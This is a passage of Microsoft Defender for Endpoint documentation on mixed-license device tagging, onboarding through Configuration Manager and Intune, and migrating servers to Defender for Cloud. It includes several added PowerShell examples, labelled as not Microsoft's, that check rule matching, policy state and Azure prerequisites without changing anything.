Plan 2 capabilities. You can choose to tag your devices manually or by using a
dynamic rule. Learn more about device tagging.

Method: Tag devices manually
To tag devices manually, create a tag called License MDE P1 and apply it to devices. To
get help with this step, see Create and manage device tags.

Note that devices that are tagged with the License MDE P1 tag using the registry key
method will not receive downgraded functionality. If you want to tag devices by using
the registry key method, use a dynamic rule instead of manual tagging.

Method: Tag devices automatically by using a dynamic rule
Dynamic rule functionality is new for mixed-license scenarios! It allows you to apply a
dynamic and granular level of control over how you manage devices.

To use a dynamic rule, you specify a set of criteria based on device name, domain,
operating system platform, and/or device tags. Devices that meet the specified criteria
will receive the Defender for Endpoint Plan 1 or Plan 2 capabilities according to your
rule.

As you define your criteria, you can use the following condition operators:
- Equals / Not equals
- Starts with
- Contains / Does not contain

For Device name, you can use freeform text.

For Domain, select from a list of domains.

For OS platform, select from a list of operating systems.

For Tag, use the freeform text option. Type the tag value that corresponds to the
devices that should receive either Defender for Endpoint Plan 1 or Plan 2 capabilities.
See the example in More details about device tagging.

Device tags are visible in the Device inventory view and in the Defender for
Endpoint APIs.

Note

Dynamically added Defender for Endpoint P1 tags are not currently
filterable in the Device inventory view.

6. Save your rule and wait for up to three (3) hours for tags to be applied. Then,
proceed to Validate that a device is receiving only Defender for Endpoint Plan
1 capabilities.

More details about device tagging

As described in the Tech Community blog How to use tagging effectively, device
tagging provides you with granular control over devices. With device tags, you can:

Display certain devices to individual users in the Microsoft Defender portal so
that they see only the devices they're responsible for.
Include or exclude devices from specific security policies.
Determine which devices should receive Defender for Endpoint Plan 1 or Plan
2 capabilities.

For example, suppose that you want to use a tag called VIP for all the devices that
should receive Defender for Endpoint Plan 2 capabilities. Here's what you would do:

1. Create a device tag called VIP, and apply it to all the devices that should
receive Defender for Endpoint Plan 2 capabilities. Use one of the following
methods to create your device tag:

Add and manage device tags using the Microsoft Defender portal.
Add device tags by setting a registry key value.
Add or remove machine tags by using the Defender for Endpoint API.
Add device tags by creating a custom profile in Microsoft Intune.

2. Set up a dynamic rule using the condition operator Tag Does not contain VIP.
In this case, all devices that do not have the VIP tag will receive the License
MDE P1 tag and Defender for Endpoint Plan 1 capabilities.
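The rule in the example above can be dry-run against an inventory export before it is saved in the portal. The following PowerShell is an added example written for this page, not Microsoft's code and not part of the original article: it models the four attributes (device name, domain, OS platform, tag) and the condition operators the article lists, applies a rule to a constructed inventory of hypothetical devices, and reports which of them would receive the License MDE P1 tag. Case-insensitive substring matching for Contains and Starts with, and filtering servers out first (the Important note above says mixed mode applies to client endpoints only), are assumptions of this model, not documented portal behaviour.

```powershell
# Added example (not Microsoft's code): local model of a mixed-license dynamic rule.
# The real evaluation happens in the Defender portal; this only helps you reason about
# which devices a rule would catch before you save it.

function Test-RuleCondition {
    param(
        [AllowEmptyCollection()] [string[]]$Values = @(),   # a device's value(s) for one attribute
        [Parameter(Mandatory)]
        [ValidateSet('Equals', 'NotEquals', 'StartsWith', 'Contains', 'DoesNotContain')]
        [string]$Operator,
        [Parameter(Mandatory)] [string]$Operand
    )
    # Escape wildcard characters so the operand is matched literally by -like.
    $literal = [System.Management.Automation.WildcardPattern]::Escape($Operand)
    # Positive operators match if ANY value satisfies them; negative operators match only
    # if NO value does. A device with no tags therefore satisfies "Does not contain".
    $anyEqual    = @($Values | Where-Object { $_ -ieq $Operand }).Count -gt 0
    $anyStarts   = @($Values | Where-Object { $_ -ilike "$literal*" }).Count -gt 0
    $anyContains = @($Values | Where-Object { $_ -ilike "*$literal*" }).Count -gt 0
    switch ($Operator) {
        'Equals'         { return $anyEqual }
        'NotEquals'      { return -not $anyEqual }
        'StartsWith'     { return $anyStarts }
        'Contains'       { return $anyContains }
        'DoesNotContain' { return -not $anyContains }
    }
}

function Select-DevicesForRule {
    param(
        [Parameter(Mandatory)] [object[]]$Devices,
        [Parameter(Mandatory)] [ValidateSet('DeviceName', 'Domain', 'OSPlatform', 'Tag')] [string]$Attribute,
        [Parameter(Mandatory)] [string]$Operator,
        [Parameter(Mandatory)] [string]$Operand
    )
    foreach ($device in $Devices) {
        # Tag is multi-valued; the other attributes hold a single value.
        $values = if ($Attribute -eq 'Tag') { @($device.Tags) } else { @($device.$Attribute) }
        if (Test-RuleCondition -Values $values -Operator $Operator -Operand $Operand) {
            # Devices matching the rule receive the License MDE P1 tag (Plan 1 capabilities).
            [pscustomobject]@{
                DeviceName   = $device.DeviceName
                ExistingTags = ($device.Tags -join ', ')
                RuleOutcome  = 'License MDE P1 (Plan 1 capabilities)'
            }
        }
    }
}

# Constructed inventory (hypothetical devices and domains, not real assets).
$inventory = @(
    [pscustomobject]@{ DeviceName = 'ws-finance-01';   Domain = 'corp.example.com'; OSPlatform = 'Windows11';         Tags = @('VIP') }
    [pscustomobject]@{ DeviceName = 'ws-frontdesk-07'; Domain = 'corp.example.com'; OSPlatform = 'Windows10';         Tags = @('Kiosk') }
    [pscustomobject]@{ DeviceName = 'ws-lab-03';       Domain = 'lab.example.com';  OSPlatform = 'Windows10';         Tags = @() }
    [pscustomobject]@{ DeviceName = 'srv-file-01';     Domain = 'corp.example.com'; OSPlatform = 'WindowsServer2022'; Tags = @('VIP') }
)
# Mixed-mode tagging applies to client endpoints only, so exclude servers up front.
$clients = $inventory | Where-Object { $_.OSPlatform -notlike 'WindowsServer*' }

# The article's rule: Tag "Does not contain" VIP. The untagged ws-lab-03 is selected too.
Select-DevicesForRule -Devices $clients -Attribute Tag -Operator DoesNotContain -Operand 'VIP' |
    Format-Table -AutoSize

# Same engine, a different criterion: every client whose name starts with "ws-lab".
Select-DevicesForRule -Devices $clients -Attribute DeviceName -Operator StartsWith -Operand 'ws-lab' |
    Format-Table -AutoSize
```

Replace the constructed inventory with an export of your own device list (device name, domain, OS platform and tags) to see which devices a candidate rule would downgrade; the tagging of servers in the sample is deliberate, to show why they are filtered before the rule runs.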

Validate that a device is receiving only Defender for Endpoint Plan 1 capabilities

After you have assigned Defender for Endpoint Plan 1 capabilities to some or all devices,
you can verify that an individual device is receiving those capabilities.

1. In the Microsoft Defender portal (https://security.microsoft.com), go to Assets >
Devices.

2. Select a device that is tagged with License MDE P1. You should see that Defender
for Endpoint Plan 1 is assigned to the device.

Note

Devices that are assigned Defender for Endpoint Plan 1 capabilities don't have any
vulnerabilities or security recommendations listed.

Review license usage

The license usage report is estimated based on sign-in activities on the device. Defender
for Endpoint Plan 2 licenses are per user, and each user can have up to five concurrent,
onboarded devices. To learn more about license terms, see Microsoft Licensing.

To reduce management overhead, there's no requirement for device-to-user mapping
and assignment. Instead, the license report provides a utilization estimation that is
calculated based on device usage seen across your organization. It might take up to one
day for your usage report to reflect the active usage of your devices.

Important

To access license information, you must have one of the following roles assigned in
Microsoft Entra ID:

Security Admin
Global Admin
License Admin + MDE Admin

1. Go to the Microsoft Defender portal (https://security.microsoft.com) and sign in.

2. Choose Settings > Endpoints > Licenses.

3. Review your available and assigned licenses. The calculation is based on detected
users who have accessed devices that are onboarded to Defender for Endpoint.

More resources
Licensing and product terms for Microsoft 365 subscriptions.
How to contact support for Defender for Endpoint.
Get started with Microsoft Security (trial offers)
Microsoft Defender for Endpoint
Microsoft Defender for Business (endpoint protection for small and medium-sized
businesses)

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Onboarding using Microsoft
Configuration Manager
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This article acts as an example onboarding method.

In the Planning article, there were several methods provided to onboard devices to the
service. This article covers the co-management architecture.

Diagram of environment architectures

While Defender for Endpoint supports onboarding of various endpoints and tools, this
article doesn't cover them. For information on general onboarding using other
supported deployment tools and methods, see Onboarding overview.

This article guides users in:

Step 1: Onboarding Windows devices to the service
Step 2: Configuring Defender for Endpoint capabilities

This onboarding guidance walks you through the following basic steps that you need to
take when using Microsoft Configuration Manager:

Creating a collection in Microsoft Configuration Manager
Configuring Microsoft Defender for Endpoint capabilities using Microsoft
Configuration Manager

Note

Only Windows devices are covered in this example deployment.

Step 1: Onboard Windows devices using Microsoft Configuration Manager

Collection creation
To onboard Windows devices with Microsoft Configuration Manager, the deployment
can target an existing collection or a new collection can be created for testing.

Onboarding using tools such as Group Policy or the manual method doesn't install any
agent on the system.

Within the Microsoft Configuration Manager console, the onboarding process is
configured as part of the compliance settings.

Any system that receives this required configuration maintains that configuration for as
long as the Configuration Manager client continues to receive this policy from the
management point.

Follow the steps below to onboard endpoints using Microsoft Configuration Manager.

1. In the Microsoft Configuration Manager console, navigate to Assets and Compliance
> Overview > Device Collections.

2. Right-click Device Collections and select Create Device Collection.

3. Provide a Name and Limiting Collection, then select Next.

4. Select Add Rule and choose Query Rule.

5. Select Next on the Direct Membership Wizard and select Edit Query
Statement.

6. Select Criteria and then choose the star icon.

7. Keep the criterion type as Simple value, choose Operating System - build
number as the attribute, is greater than or equal to as the operator, and 14393 as the
value, and then select OK.

8. Select Next and Close.

9. Select Next.

After completing this task, you now have a device collection with all the Windows
endpoints in the environment.

Step 2: Configure Microsoft Defender for Endpoint capabilities

This section guides you in configuring the following capabilities using Microsoft
Configuration Manager on Windows devices:

Endpoint detection and response
Next-generation protection
Attack surface reduction

Endpoint detection and response

Windows 10 and Windows 11

From within the Microsoft Defender portal it's possible to download the .onboarding
policy that can be used to create the policy in System Center Configuration Manager
and deploy that policy to Windows 10 and Windows 11 devices.

1. From the Microsoft Defender portal, select Settings and then Onboarding.

2. Under Deployment method, select the supported version of Microsoft
Configuration Manager.

3. Select Download package.

4. Save the package to an accessible location.

5. In Microsoft Configuration Manager, navigate to: Assets and Compliance >
Overview > Endpoint Protection > Microsoft Defender ATP Policies.

6. Right-click Microsoft Defender ATP Policies and select Create Microsoft Defender
ATP Policy.

7. Enter the name and description, verify Onboarding is selected, then select Next.

8. Select Browse.

9. Navigate to the location of the downloaded file from step 4 above.

10. Select Next.

11. Configure the Agent with the appropriate samples (None or All file types).

12. Select the appropriate telemetry (Normal or Expedited) then select Next.

13. Verify the configuration, then select Next.

14. Select Close when the Wizard completes.

15. In the Microsoft Configuration Manager console, right-click the Defender for
Endpoint policy you created and select Deploy.

16. On the right panel, select the previously created collection and select OK.

Previous versions of Windows Client (Windows 7 and Windows 8.1)

Follow the steps below to identify the Defender for Endpoint Workspace ID and
Workspace Key that will be required for the onboarding of previous versions of
Windows.

1. From the Microsoft Defender portal, select Settings > Endpoints > Onboarding
(under Device Management).

2. Under operating system, choose Windows 7 SP1 and 8.1.

3. Copy the Workspace ID and Workspace Key and save them. They'll be used later
in the process.

4. Install the Microsoft Monitoring Agent (MMA).

MMA is currently (as of January 2019) supported on the following Windows
Operating Systems:

Server SKUs: Windows Server 2008 SP1 or Newer
Client SKUs: Windows 7 SP1 and later

The MMA agent needs to be installed on Windows devices. To install the agent,
some systems need to download the Update for customer experience and
diagnostic telemetry in order to collect the data with MMA. These system
versions include but may not be limited to:

Windows 8.1
Windows 7
Windows Server 2016
Windows Server 2012 R2
Windows Server 2008 R2

Specifically, for Windows 7 SP1, the following patches must be installed:

Install KB4074598
Install either .NET Framework 4.5 (or later) or KB3154518. Do not install
both on the same system.

5. If you're using a proxy to connect to the Internet see the Configure proxy settings
section.

Once completed, you should see onboarded endpoints in the portal within an hour.

Next generation protection

Microsoft Defender Antivirus is a built-in anti-malware solution that provides next
generation protection for desktops, portable computers, and servers.

1. In the Microsoft Configuration Manager console, navigate to Assets and
Compliance > Overview > Endpoint Protection > Antimalware Policies and
choose Create Antimalware Policy.

2. Select Scheduled scans, Scan settings, Default actions, Real-time protection,
Exclusion settings, Advanced, Threat overrides, Cloud Protection Service and
Security intelligence updates and choose OK.

Certain industries or some select enterprise customers might have specific needs
for how antivirus is configured.

Quick scan versus full scan and custom scan

For more information, see Windows Security configuration framework.

3. Right-click on the newly created anti-malware policy and select Deploy.

4. Target the new anti-malware policy to your Windows collection and select OK.

After completing this task, you now have successfully configured Microsoft Defender
Antivirus.

Attack surface reduction
The attack surface reduction pillar of Defender for Endpoint includes the feature set that
is available under Exploit Guard: attack surface reduction rules, Controlled Folder
Access, Network Protection, and Exploit Protection.

All these features provide a test mode and a block mode. In test mode, there's no end-
user impact; the feature only collects additional telemetry and makes it available in the
Microsoft Defender portal. The goal of a deployment is to move security controls into
block mode step by step.

To set attack surface reduction rules in test mode:

1. In the Microsoft Configuration Manager console, navigate to Assets and
Compliance > Overview > Endpoint Protection > Windows Defender Exploit
Guard and choose Create Exploit Guard Policy.

2. Select Attack Surface Reduction.

3. Set rules to Audit and select Next.

4. Confirm the new Exploit Guard policy by selecting Next.

5. Once the policy is created, select Close.

6. Right-click on the newly created policy and choose Deploy.

7. Target the policy to the newly created Windows collection and select OK.

After completing this task, you now have successfully configured attack surface
reduction rules in test mode.

Below are more steps to verify whether attack surface reduction rules are correctly
applied to endpoints. (This may take a few minutes.)

1. From a web browser, go to Microsoft Defender XDR.

2. Select Configuration management from the left-side menu.

3. Select Go to attack surface management in the Attack surface management panel.

4. Select the Configuration tab in the Attack surface reduction rules report. It shows an
overview of the attack surface reduction rules configuration and the status of the rules
on each device.

5. Select a device to show the configuration details of its attack surface reduction rules.

See Optimize attack surface reduction rule deployment and detections for more details.

Set Network Protection rules in test mode

1. In the Microsoft Configuration Manager console, navigate to Assets and
Compliance > Overview > Endpoint Protection > Windows Defender Exploit
Guard and choose Create Exploit Guard Policy.

2. Select Network protection.

3. Set the setting to Audit and select Next.

4. Confirm the new Exploit Guard Policy by selecting Next.

5. Once the policy is created, select Close.

6. Right-click on the newly created policy and choose Deploy.

7. Target the policy to the newly created Windows collection and choose OK.

After completing this task, you now have successfully configured Network Protection in
test mode.

To set Controlled Folder Access rules in test mode

1. In the Microsoft Configuration Manager console, navigate to Assets and
Compliance > Overview > Endpoint Protection > Windows Defender Exploit
Guard and then choose Create Exploit Guard Policy.

2. Select Controlled folder access.

3. Set the configuration to Audit and select Next.

4. Confirm the new Exploit Guard Policy by selecting Next.

5. Once the policy is created, select Close.

6. Right-click on the newly created policy and choose Deploy.

7. Target the policy to the newly created Windows collection and select OK.

You have now successfully configured Controlled folder access in test mode.

Related article
Onboarding using Microsoft Configuration Manager

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Onboarding using Microsoft Intune
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This article acts as an example onboarding method.

In the Planning article, there were several methods provided to onboard devices to the
service. This article covers the cloud-native architecture.

Diagram of environment architectures

While Defender for Endpoint supports onboarding of various endpoints and tools, this
article doesn't cover them. For information on general onboarding using other
supported deployment tools and methods, see Onboarding overview.

The Microsoft Intune family of products is a solution platform that unifies several
services. It includes Microsoft Intune and Microsoft Configuration Manager.

This article guides users in:

Step 1: Onboarding devices to the service by creating a group in Microsoft Intune
to assign configurations on
Step 2: Configuring Defender for Endpoint capabilities using Microsoft Intune

This onboarding guidance walks you through the following basic steps that you need to
take when using Microsoft Intune:

Identifying target devices or users
Creating a Microsoft Entra group (User or Device)
Creating a Configuration Profile
In Microsoft Intune, we guide you in creating a separate policy for each
capability.

Resources
Here are the links you need for the rest of the process:

Intune admin center
Microsoft Defender XDR
Intune Security baselines

For more information about Microsoft Intune, go to Microsoft Intune securely manages
identities, manages apps, and manages devices.

Step 1: Onboard devices by creating a group in Intune to assign configurations on

Identify target devices or users

In this section, we create a test group to assign your configurations on.

Note

Intune uses Microsoft Entra groups to manage devices and users. As an Intune
admin, you can set up groups to suit your organizational needs.

For more information, see Add groups to organize users and devices.

Create a group
1. Open the Microsoft Intune admin center.

2. Open Groups > New Group.

3. Enter details and create a new group.

4. Add your test user or device.

5. From the Groups > All groups pane, open your new group.

6. Select Members > Add members.

7. Find your test user or device and select it.

8. Your testing group now has a member to test.

Step 2: Create configuration policies to configure Microsoft Defender for Endpoint
capabilities

In the following section, you create several configuration policies.

First is a configuration policy to select which groups of users or devices are onboarded
to Defender for Endpoint:

Endpoint detection and response

Then, you continue by creating several different types of endpoint security policies:

Next-generation protection
Attack surface reduction

Endpoint detection and response

1. Open the Intune admin center.

2. Navigate to Endpoint security > Endpoint detection and response. Select
Create Policy.

3. Under Platform, select Windows 10, Windows 11, and Windows Server, Profile -
Endpoint detection and response > Create.

4. Enter a name and description, then select Next.

5. Select settings as required, then select Next.

Note

In this instance, the settings have been auto-populated because Defender for
Endpoint has already been integrated with Intune. For more information on the
integration, see Enable Microsoft Defender for Endpoint in Intune.

The following image is an example of what you'll see when Microsoft
Defender for Endpoint is NOT integrated with Intune:

6. Add scope tags if necessary, then select Next.

7. Add your test group by selecting Select groups to include and choosing your
group, then select Next.

8. Review and accept, then select Create.

9. You can view your completed policy.

Next-generation protection
1. Open the Intune admin center.

2. Navigate to Endpoint security > Antivirus > Create Policy.

3. Select Platform - Windows 10 and Later - Windows and Profile - Microsoft
Defender Antivirus > Create.

4. Enter name and description, then select Next.

5. In the Configuration settings page: Set the configurations you require for
Microsoft Defender Antivirus (Cloud Protection, Exclusions, Real-Time Protection,
and Remediation).

6. Add scope tags if necessary, then select Next.

7. Select groups to include, assign to your test group, then select Next.

8. Review and create, then select Create.

9. You see the configuration policy you created.

Attack Surface Reduction - Attack surface reduction rules

1. Open the Intune admin center.

2. Navigate to Endpoint security > Attack surface reduction.

3. Select Create Policy.

4. Select Platform - Windows 10 and Later - Profile - Attack surface reduction rules
> Create.

5. Enter a name and description, then select Next.

6. In the Configuration settings page: Set the configurations you require for Attack
surface reduction rules, then select Next.

Note

We will be configuring all of the Attack surface reduction rules to Audit.

For more information, see Attack surface reduction rules.

7. Add Scope Tags as required, then select Next.

8. Select groups to include and assign to test group, then select Next.

9. Review the details, then select Create.

10. View the policy.


Attack Surface Reduction - Web Protection

1. Open the Intune admin center.

2. Navigate to Endpoint security > Attack surface reduction.

3. Select Create Policy.

4. Select Windows 10 and Later - Web protection > Create.

5. Enter a name and description, then select Next.

6. In the Configuration settings page: Set the configurations you require for Web
Protection, then select Next.

Note

We are configuring Web Protection to Block.

For more information, see Web Protection.

7. Add Scope Tags as required > Next.

8. Select Assign to test group > Next.

9. Select Review and Create > Create.

10. View the policy.

Validate configuration settings

Confirm policies have been applied

Once the Configuration policy has been assigned, it takes some time to apply.

For information on timing, see Intune configuration information.

To confirm that the configuration policy is applied to your test device, follow this
process for each configuration policy.

1. Open the Intune admin center and navigate to the relevant policy as shown in the
preceding section. The following example shows the next generation protection
settings.

2. Select the Configuration Policy to view the policy status.

3. Select Device Status to see the status.

4. Select User Status to see the status.

5. Select Per-setting status to see the status.

Tip

This view is very useful to identify any settings that conflict with another
policy.

Confirm endpoint detection and response

1. Before applying the configuration, the Defender for Endpoint Protection service
shouldn't be started.

2. After the configuration is applied, the Defender for Endpoint Protection service
should be started.

3. After the services are running on the device, the device appears in the Microsoft
Defender portal.

Confirm next-generation protection

1. Before applying the policy on a test device, you should be able to manually
manage the settings as shown in the following image:

2. After the policy is applied, you shouldn't be able to manually manage the settings.

Note

In the following image, Turn on cloud-delivered protection and Turn on real-time
protection are shown as managed.

Confirm Attack Surface Reduction - Attack surface reduction rules

1. Before applying the policy on a test device, open a PowerShell window and type
Get-MpPreference.

2. You should see the following lines with no content:

AttackSurfaceReductionOnlyExclusions:

AttackSurfaceReductionRules_Actions:

AttackSurfaceReductionRules_Ids:

3. After applying the policy on a test device, open a PowerShell window and type
Get-MpPreference.

4. You should see the following lines with content, as shown in the following image:

Confirm Attack Surface Reduction - Web Protection

1. On the test device, open a PowerShell window and type
(Get-MpPreference).EnableNetworkProtection.

2. This should respond with a 0, as shown in the following image:

3. After applying the policy, open a PowerShell window and type
(Get-MpPreference).EnableNetworkProtection.

4. You should see a response with a 1, as shown in the following image:
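The three confirmation checks described above (the sensor service for endpoint detection and response, the Get-MpPreference attack surface reduction arrays, and EnableNetworkProtection) gathered into one script so that a before/after snapshot of a test device can be compared. This is an added example, not code from the article; it assumes an elevated PowerShell window on a Windows device with Microsoft Defender Antivirus installed, and it assumes that "Sense" is the service name of the Defender for Endpoint sensor (the MsSense.exe component named elsewhere in this documentation).

```powershell
# Added example: snapshot EDR sensor, ASR rule and network protection state on a
# test device, before and after an Intune policy is assigned. Run elevated.
# Assumption: the Defender for Endpoint sensor service is named "Sense".

function Test-MdePolicyState {
    [CmdletBinding()]
    param()

    $results = [ordered]@{}

    # 1. Endpoint detection and response: the sensor service should be stopped
    #    before the configuration applies and running afterwards.
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $results['EdrSensorRunning'] = ($null -ne $sense -and $sense.Status -eq 'Running')

    $pref = Get-MpPreference

    # 2. Attack surface reduction: before the policy applies both arrays are empty;
    #    afterwards each rule GUID has a matching action
    #    (0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn).
    $ids         = @($pref.AttackSurfaceReductionRules_Ids)
    $actions     = @($pref.AttackSurfaceReductionRules_Actions)
    $actionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
    $asrRules = for ($i = 0; $i -lt $ids.Count; $i++) {
        [pscustomobject]@{
            RuleId = $ids[$i]
            Action = $actionNames[[int]$actions[$i]]
        }
    }
    $results['AsrRuleCount']    = $ids.Count
    $results['AsrRulesInBlock'] = @($asrRules | Where-Object Action -eq 'Block').Count
    $results['AsrRules']        = $asrRules

    # 3. Web protection (network protection): 0 = disabled (before the policy),
    #    1 = block mode (after the policy), 2 = audit mode.
    $results['NetworkProtection']         = [int]$pref.EnableNetworkProtection
    $results['NetworkProtectionBlocking'] = ([int]$pref.EnableNetworkProtection -eq 1)

    [pscustomobject]$results
}

# Usage: run once before the policy is assigned and once after, then compare.
$state = Test-MdePolicyState
$state | Format-List EdrSensorRunning, AsrRuleCount, AsrRulesInBlock, NetworkProtection
$state.AsrRules | Format-Table -AutoSize
```

Keeping the two snapshots (for example by piping the object to Export-Clixml) gives you evidence of which rules the policy actually pushed, which is the quickest way to spot a setting that lost a conflict with another policy.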

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Move to Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Migration and setup guides

If you're considering moving to Defender for Endpoint, we have guidance to help. In the
following table, review the scenarios. Select the scenario that best represents your
situation, and see the recommended guidance.

Scenario: You don't have an endpoint protection solution in place yet, and you want
to know more about Defender for Endpoint. You want to see how Defender for Endpoint
works before rolling it out in your environment.
Guidance: Microsoft Defender for Endpoint evaluation lab

Scenario: You already have Defender for Endpoint, and you want some help getting
everything set up and configured.
Guidance: Microsoft Defender for Endpoint deployment guide

Scenario: You're planning to switch from a non-Microsoft endpoint protection solution
to Defender for Endpoint, which includes Microsoft Defender Antivirus. You want to get
an overview of the migration process and how to make the switch.
Guidance: Make the switch to Microsoft Defender for Endpoint

Scenario: You've already migrated or onboarded to Defender for Endpoint. You want
some help with next steps, such as managing your security settings, configuring more
features, or fine-tuning your security policies.
Guidance: Configure general Defender for Endpoint settings

Scenario: You were previously using Microsoft Defender for Endpoint Server, and now
you're moving your servers to Microsoft Defender for Cloud.
Guidance: Migrating servers from Microsoft Defender for Endpoint to Microsoft Defender
for Cloud

Do you have feedback for us?
Let us know what you think! Submit your feedback at the bottom of the page. We'll take
your feedback into account as we continue to improve and add to our migration
guidance.

See also
Microsoft Defender XDR
Microsoft Defender for Endpoint
Microsoft Defender for Office 365
Microsoft 365 Business Premium
Microsoft Defender for Business


Migrating servers from Microsoft Defender for Endpoint to Microsoft Defender for Cloud
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

This article guides you in migrating servers from Microsoft Defender for Endpoint to
Defender for Cloud.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed
to help enterprise networks prevent, detect, investigate, and respond to advanced
threats.

Microsoft Defender for Cloud is a solution for cloud security posture management
(CSPM) and cloud workload protection (CWP) that finds weak spots across your cloud
configuration. It also helps strengthen the overall security posture of your environment,
and can protect workloads across multicloud and hybrid environments from evolving
threats.

While both products offer server protection capabilities, Microsoft Defender for Cloud is
our primary solution to protect infrastructure resources, including servers.

How do I migrate my servers from Microsoft Defender for Endpoint to Microsoft
Defender for Cloud?

If you have servers onboarded to Defender for Endpoint, the migration process varies
depending on machine type, but there's a set of shared prerequisites.

Microsoft Defender for Cloud is a subscription-based service in the Microsoft Azure
portal. Therefore, Defender for Cloud and the underlying plans like Microsoft Defender
for Servers Plan 2 need to be enabled on Azure subscriptions.

To enable Defender for Servers for Azure VMs and non-Azure machines connected
through Azure Arc-enabled servers, follow this guideline:

1. If you aren't already using Azure, plan your environment following the Azure Well-
Architected Framework.

2. Enable Microsoft Defender for Cloud on your subscription.

3. Enable a Microsoft Defender for Server plan on your subscription(s). In case you're
using Defender for Servers Plan 2, make sure to also enable it on the Log Analytics
workspace your machines are connected to; it enables you to use optional features
like File Integrity Monitoring, Adaptive Application Controls, and more.

4. Make sure the MDE integration is enabled on your subscription. If you have pre-
existing Azure subscriptions, you might see one (or both) of the two opt-in buttons
shown in the image below.

If you have any of these buttons in your environment, make sure to enable
integration for both. On new subscriptions, both options are enabled by default. In
this case, you don't see these buttons in your environment.

5. Make sure the connectivity requirements for Azure Arc are met. Microsoft
Defender for Cloud requires all on-premises and non-Azure machines to be
connected via the Azure Arc agent. In addition, Azure Arc doesn't support all MDE
supported operating systems. So, learn how to plan for Azure Arc deployments
here.

6. Recommended: If you want to see vulnerability findings in Defender for Cloud,
make sure to enable Microsoft Defender Vulnerability Management for Defender
for Cloud.
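A readiness check for the shared prerequisites in steps 3 to 5 above (the Defender for Servers plan tier, the two MDE integration opt-ins, and Azure Arc connectivity), written as an added example rather than Microsoft's own tooling. It assumes the Az.Accounts, Az.Security and Az.ConnectedMachine PowerShell modules are installed, that the caller has at least Reader on the subscription, and that the integration settings are exposed under the names WDATP and WDATP_UNIFIED_SOLUTION (an assumption to verify against what your portal shows); the subscription id is a placeholder.

```powershell
# Added example: check the Defender for Servers prerequisites on one subscription.
# Assumes Az.Accounts, Az.Security and Az.ConnectedMachine; run Connect-AzAccount first.
# Assumption: the MDE integration opt-ins are the security settings named
# "WDATP" and "WDATP_UNIFIED_SOLUTION".

function Test-DefenderForServersReadiness {
    param(
        [Parameter(Mandatory)] [string] $SubscriptionId
    )

    Set-AzContext -SubscriptionId $SubscriptionId | Out-Null

    # Step 3: the Defender for Servers plan must be on the Standard (paid) tier.
    $vmPricing   = Get-AzSecurityPricing -Name VirtualMachines
    $planEnabled = ($vmPricing.PricingTier -eq 'Standard')

    # Step 4: both MDE integration settings should be enabled.
    $integration = foreach ($name in 'WDATP', 'WDATP_UNIFIED_SOLUTION') {
        $s = Get-AzSecuritySetting -SettingName $name -ErrorAction SilentlyContinue
        [pscustomobject]@{ Setting = $name; Enabled = [bool]($s -and $s.Enabled) }
    }

    # Step 5: on-premises and other non-Azure machines must be Arc-connected;
    # list any Arc machine whose agent is not currently connected.
    $arc          = @(Get-AzConnectedMachine -ErrorAction SilentlyContinue)
    $disconnected = @($arc | Where-Object { $_.Status -ne 'Connected' })

    [pscustomobject]@{
        SubscriptionId       = $SubscriptionId
        DefenderForServersOn = $planEnabled
        PricingTier          = $vmPricing.PricingTier
        MdeIntegration       = $integration
        ArcMachineCount      = $arc.Count
        ArcDisconnected      = $disconnected.Name
        Ready                = $planEnabled -and
                               -not ($integration.Enabled -contains $false) -and
                               $disconnected.Count -eq 0
    }
}

# Usage (placeholder subscription id):
# Connect-AzAccount
# Test-DefenderForServersReadiness -SubscriptionId '<subscription-id>' | Format-List
```

Run it once per subscription that holds servers; a Ready value of False together with the MdeIntegration and ArcDisconnected fields tells you which prerequisite still needs attention before the extension deployment described later in this article can succeed.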


How do I migrate existing Azure VMs to Microsoft Defender for Cloud?

For Azure VMs, no extra steps are required. They are automatically onboarded to
Microsoft Defender for Cloud, thanks to the native integration between the Azure
platform and Defender for Cloud.

How do I migrate on-premises machines to Microsoft Defender for Servers?

Once all prerequisites are met, connect your on-premises machines via Azure Arc-
connected servers.

How do I migrate VMs from AWS or GCP environments?

1. Create a new multicloud connector on your subscription. (For more information on
connectors, see AWS accounts or GCP projects.)

2. On your multicloud connector, enable Defender for Servers on AWS or GCP
connectors.

3. Enable autoprovisioning on the multicloud connector for the Azure Arc agent,
Microsoft Defender for Endpoint extension, Vulnerability Assessment and,
optionally, Log Analytics extension.

For more information, see Defender for Cloud's multicloud capabilities.


What happens once all migration steps are completed?

After you complete the relevant migration steps, Microsoft Defender for Cloud deploys
the MDE.Windows or MDE.Linux extension to your Azure VMs and non-Azure machines
connected through Azure Arc (including VMs in AWS and GCP compute).

The extension acts as a management and deployment interface, which orchestrates and
wraps the MDE installation scripts inside the operating system and reflects its
provisioning state to the Azure management plane. The installation process recognizes
an existing Defender for Endpoint installation and connects it to Defender for Cloud by
automatically adding Defender for Endpoint service tags.

In case you have devices running Windows Server 2012 R2 or Windows Server 2016, and
those devices are provisioned with the legacy, Log Analytics-based Microsoft Defender
for Endpoint solution, Microsoft Defender for Cloud's deployment process deploys the
Defender for Endpoint unified solution. After successful deployment, it will stop and
disable the legacy Defender for Endpoint process on these machines.


Migrate to Microsoft Defender for Endpoint from non-Microsoft endpoint protection
Article • 10/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
